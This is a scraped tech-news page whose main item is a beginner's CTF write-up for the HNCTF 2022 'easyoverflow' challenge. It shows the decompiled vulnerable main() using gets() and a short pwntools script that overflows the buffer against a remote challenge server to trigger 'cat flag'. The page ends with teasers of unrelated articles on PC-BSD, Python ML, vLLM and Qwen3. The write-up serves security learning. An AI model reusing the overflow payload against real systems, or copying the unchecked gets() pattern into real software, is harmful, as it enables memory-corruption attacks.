news 2026/6/10 18:34:42

[HNCTF 2022 Week1]easyoverflow

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[HNCTF 2022 Week1]easyoverflow

第一次打CTF——PWN篇学习笔记13

checksec一下没有特殊的保护机制,从ida中可以看到,只要v5不等于0即可得到flag

int __fastcall main(int argc, const char **argv, const char **envp) { _BYTE v4[44]; // [rsp+0h] [rbp-30h] BYREF int v5; // [rsp+2Ch] [rbp-4h] ​ setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); puts("Input something"); v5 = 0; gets(v4); if ( v5 ) { puts("You win."); system("cat flag"); } return 0; }
from pwn import * import struct ​ context.arch = 'amd64' context.os = 'linux' ​ #io = process('./pwn') io = remote("node5.anna.nssctf.cn",26780) ​ payload = b'A' * 0x30 ​ io.sendline(payload) ​ io.interactive()
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/10 0:24:29

20、PC-BSD系统:获取帮助与积极参与指南

PC-BSD系统:获取帮助与积极参与指南 一、PC-BSD系统获取帮助的途径 1.1 PC - BSD邮件列表 邮件列表是与其他用户互动的另一种方式。有些用户更习惯使用电子邮件,相较于在线论坛,他们更喜欢邮件列表;还有些用户希望邮件直接到达收件箱,而不必去论坛搜索信息。当你在谷歌…

作者头像 李华
网站建设 2026/6/9 20:14:55

Python机器学习:从零基础到深度实战

​目录第一部分:思想与基石——万法归宗,筑基问道第1章:初探智慧之境——机器学习世界观1.1 何为学习?从人类学习到机器智能1.2 机器学习的“前世今生”:一部思想与技术的演进史1.3 为何是Python?——数据科…

作者头像 李华
网站建设 2026/6/10 15:23:44

23、PC-BSD 高级任务操作指南

PC-BSD 高级任务操作指南 1. 单用户模式的使用 当你忘记超级用户密码或需要重置它时,单用户模式就派上用场了。进入单用户模式的操作步骤如下: 1. 启动系统并留意启动信息。 2. 当看到 “Welcome to PC - BSD!” 屏幕时,按 4 选择 “Boot PC - BSD in single user mode”…

作者头像 李华
网站建设 2026/6/10 13:33:43

vLLM中FlashAttention与KVCache优化解析

vLLM中FlashAttention与KVCache优化解析 在当前大模型推理部署的生产实践中,高吞吐、低延迟、内存高效已成为核心诉求。传统Transformer推理方案受限于注意力机制的计算与访存瓶颈,在长序列和高并发场景下表现乏力。而 vLLM(Virtual Memory f…

作者头像 李华
网站建设 2026/6/9 21:40:21

Qwen3-14B-Base:148亿参数如何重塑大模型效率

Qwen3-14B-Base:148亿参数如何重塑大模型效率 在AI竞赛从“比谁更大”转向“看谁更聪明”的今天,一个看似矛盾的现象正在发生:参数规模不到前代一半的模型,反而在真实任务中全面超越了百亿级巨无霸。阿里巴巴通义千问团队发布的 Q…

作者头像 李华
网站建设 2026/6/10 9:23:44

0.5B参数多模态检索模型KaLM-Embedding-V2.5发布

KaLM-Embedding-V2.5:0.5B参数如何重塑多模态检索的边界 在AI模型纷纷向千亿参数冲刺的今天,一个仅含0.5B参数的小型多模态模型却悄然打破了“大即强”的迷思。HIT-TMG团队发布的 KaLM-Embedding-V2.5,不仅实现了文本与图像在统一语义空间中…

作者头像 李华